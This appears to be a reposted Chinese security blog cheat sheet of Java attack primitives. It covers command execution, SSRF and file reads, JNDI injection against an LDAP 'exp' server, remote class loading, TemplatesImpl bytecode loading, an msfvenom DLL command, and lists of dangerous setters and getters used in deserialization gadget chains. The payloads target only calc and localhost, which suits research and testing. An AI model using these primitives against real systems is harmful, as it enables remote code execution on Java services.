常用基础java代码
2023-12-5 15:19:55 Author: 珂技知识分享(查看原文) 阅读量:0 收藏

命令执行1

Runtime.getRuntime().exec("calc");

命令执行2

new ProcessBuilder("cmd", "/c calc").start();

命令执行3

String [] cmd={"cmd.exe","/c","calc"};Class processimpl=Class.forName("java.lang.ProcessImpl");java.lang.reflect.Method m1=processimpl.getDeclaredMethod("start", String[].class, java.util.Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class);m1.setAccessible(true);Process p=(Process) m1.invoke(processimpl,cmd,null,null,null,false);

加载动态链接库

NativeLibLoader.loadLibrary("calc");//windows会默认增加.dll后缀,linux会增加.so//linux gcc编译即可,windows如下//msfvenom -p windows/x64/exec cmd="calc.exe" exitfunc=thread -f dll -o calc.dl

命令回显1

Process process = Runtime.getRuntime().exec("cmd.exe /c "+"ipconfig");InputStream in =  process.getInputStream();BufferedReader br = new BufferedReader(new InputStreamReader(in));String line;StringBuilder sb = new StringBuilder();while ((line = br.readLine()) != null) {sb.append(line).append("\n");}String str = sb.toString();System.out.println(str);

命令回显2

String cmd = "whoami";boolean isWin = java.lang.System.getProperty("os.name").toLowerCase().contains("win");String[] cmds = isWin ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();Scanner s = new Scanner(in).useDelimiter("\\a");String output = s.hasNext() ? s.next() : "";System.out.println(output);

SSRF

new URL("http://127.0.0.1/").openStream();
new JEditorPane().setPage("http://127.0.0.1/");

文件写入1

new FileOutputStream("1.txt").write("test".getBytes());

文件写入2

FileWriter fw = new FileWriter(new File("test.txt"));fw.write("test");fw.close();

文件读取1

FileInputStream inputFromFile = new FileInputStream("Calc.class");byte[] bs = new byte[inputFromFile.available()];inputFromFile.read(bs);System.out.println(Arrays.toString(bs));System.out.println(new String(bs));

文件读取2

//形成SSRF,可读目录String url = "file:///D:/";InputStream input = new URL(url).openStream();byte[] bs = new byte[input.available()];input.read(bs);System.out.println(Arrays.toString(bs));System.out.println(new String(bs));

JNDI注入

new javax.naming.InitialContext().lookup("ldap://127.0.0.1:1389/exp");

远程class加载

URL[] urls = new URL[]{new URL("http://127.0.0.1/")};URLClassLoader.newInstance(urls).loadClass("Exploit").newInstance();

序列化/反序列化1

ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("1.ser"));objectOutputStream.writeObject(queue);objectOutputStream.close();ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("1.ser"));objectInputStream.readObject();

序列化/反序列化2

ByteArrayOutputStream out = new ByteArrayOutputStream();ObjectOutputStream oos = new ObjectOutputStream(out);oos.writeObject(queue);String base64 = java.util.Base64.getEncoder().encodeToString(out.toByteArray());System.out.println(base64);System.out.println(base64.replace("+", "%2B"));System.out.println(Arrays.toString(bs));ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(out.toByteArray()));Object o = (Object)ois.readObject();

兼容性base64

    public byte[] base64_decode(String string) throws Exception {        byte[] bytes;        try {            try {                Object decoder = Class.forName("java.util.Base64").getMethod("getDecoder").invoke(null);                bytes = (byte[]) Class.forName("java.util.Base64$Decoder").getMethod("decode",String.class).invoke(decoder, string);            } catch (Exception e) {                Object decoder = Class.forName("java.util.Base64").getMethod("getMimeDecoder").invoke(null);                bytes = (byte[]) Class.forName("java.util.Base64$Decoder").getMethod("decode",String.class).invoke(decoder, string);            }        } catch (Exception e) {            bytes = (byte[]) Class.forName("sun.misc.BASE64Decoder").getMethod("decodeBuffer",String.class).invoke(Class.forName("sun.misc.BASE64Decoder").newInstance(), string);        }        return bytes;    }    public static String base64_encode(byte[] bs) throws Exception {        String base64;        try {            base64 = (String) Class.forName("sun.misc.BASE64Encoder").getMethod("encodeBuffer",byte[].class).invoke(Class.forName("sun.misc.BASE64Encoder").newInstance(), bs);        } catch (Exception e) {            Object encoder = Class.forName("java.util.Base64").getMethod("getEncoder").invoke(null);            base64 = (String) Class.forName("java.util.Base64$Encoder").getMethod("encodeToString",byte[].class).invoke(encoder, bs);        }        return base64.replace("\r\n", "");           }

getFieldValue

    public static Object getFieldValue(Object obj, String fieldName) throws Exception {        Field field = obj.getClass().getDeclaredField(fieldName);        //这里取不到就需要找父类        field.setAccessible(true);        return field.get(obj);    }

setFieldValue

    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {        Field field = obj.getClass().getDeclaredField(fieldName);        field.setAccessible(true);        field.set(obj, value);    }

查看sUID

ObjectStreamClass osc1 = ObjectStreamClass.lookup(bsh.XThis.class);System.out.println(osc1.getSerialVersionUID());

修改sUID

TemplatesImpl obj = new TemplatesImpl();java.lang.reflect.Field sUID = obj.getClass().getDeclaredField("serialVersionUID");sUID.setAccessible(true);Field modifiersField = Field.class.getDeclaredField("modifiers");modifiersField.setAccessible(true);modifiersField.setInt(sUID, sUID.getModifiers() & ~Modifier.FINAL);sUID.set(obj, -3070939614679977597L);System.out.print(getFieldValue(obj, "serialVersionUID"));

有危害的setter

JdbcRowSetImpl obj = new JdbcRowSetImpl();obj.setDataSourceName("ldap://127.0.0.1:1389/exp");obj.setAutoCommit(true);        oracle.jdbc.rowset.OracleJDBCRowSet obj2 = new OracleJDBCRowSet();obj2.setDataSourceName("ldap://127.0.0.1:1389/exp");obj2.setCommand("123");
com.sun.management.jmx.TraceListener obj3 = new com.sun.management.jmx.TraceListener();obj3.setFile("1.php::$INDEX_ALLOCATION"); new JEditorPane().setPage("http://127.0.0.1/");
new org.apache.batik.swing.JSVGCanvas().setURI("http://127.0.0.1/");

有危害的getter

java.net.URL url = new URL("http://127.0.0.1");url.getContent();        com.sun.rowset.JdbcRowSetImpl obj = new JdbcRowSetImpl();obj.setDataSourceName("ldap://127.0.0.1:1389/exp");obj.getDatabaseMetaData();
Constructor<?> ctor = Class.forName("com.sun.jndi.ldap.LdapAttribute").getDeclaredConstructor(new Class<?>[]{String.class});ctor.setAccessible(true);javax.naming.directory.Attribute obj2 = (Attribute) ctor.newInstance("id");setFieldValue(obj2, "baseCtxURL", "ldap://127.0.0.1:1389");setFieldValue(obj2, "rdn", new CompositeName("exp"));obj2.getAttributeDefinition();
FileInputStream inputFromFile = new FileInputStream("D:\\Downloads\\workspace\\test\\bin\\test\\TemplatesImplcmd.class");byte[] bs = new byte[inputFromFile.available()];inputFromFile.read(bs);TemplatesImpl obj3 = new TemplatesImpl();setFieldValue(obj3, "_bytecodes", new byte[][]{bs});setFieldValue(obj3, "_name", "TemplatesImpl");setFieldValue(obj3, "_tfactory", new TransformerFactoryImpl());obj3.getOutputProperties();
oracle.jdbc.rowset.OracleCachedRowSet obj4 = new OracleCachedRowSet();obj4.setDataSourceName("ldap://127.0.0.1:1389/exp");obj4.getConnection();

有危害的单String参数构造函数

org.springframework.context.support.ClassPathXmlApplicationContext obj = new ClassPathXmlApplicationContext("http://127.0.0.1");org.springframework.context.support.FileSystemXmlApplicationContext obj2 = new FileSystemXmlApplicationContext("http://127.0.0.1");java.io.FileOutputStream obj3 = new FileOutputStream("test");

文章来源: http://mp.weixin.qq.com/s?__biz=MzUzNDMyNjI3Mg==&mid=2247486611&idx=1&sn=115de665046dd6856fdace162f310c3e&chksm=fa9731fccde0b8ea64e5003a711b0f8dfa1b4264eaa90e058d26660d73cb4c98987e21711d5f&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh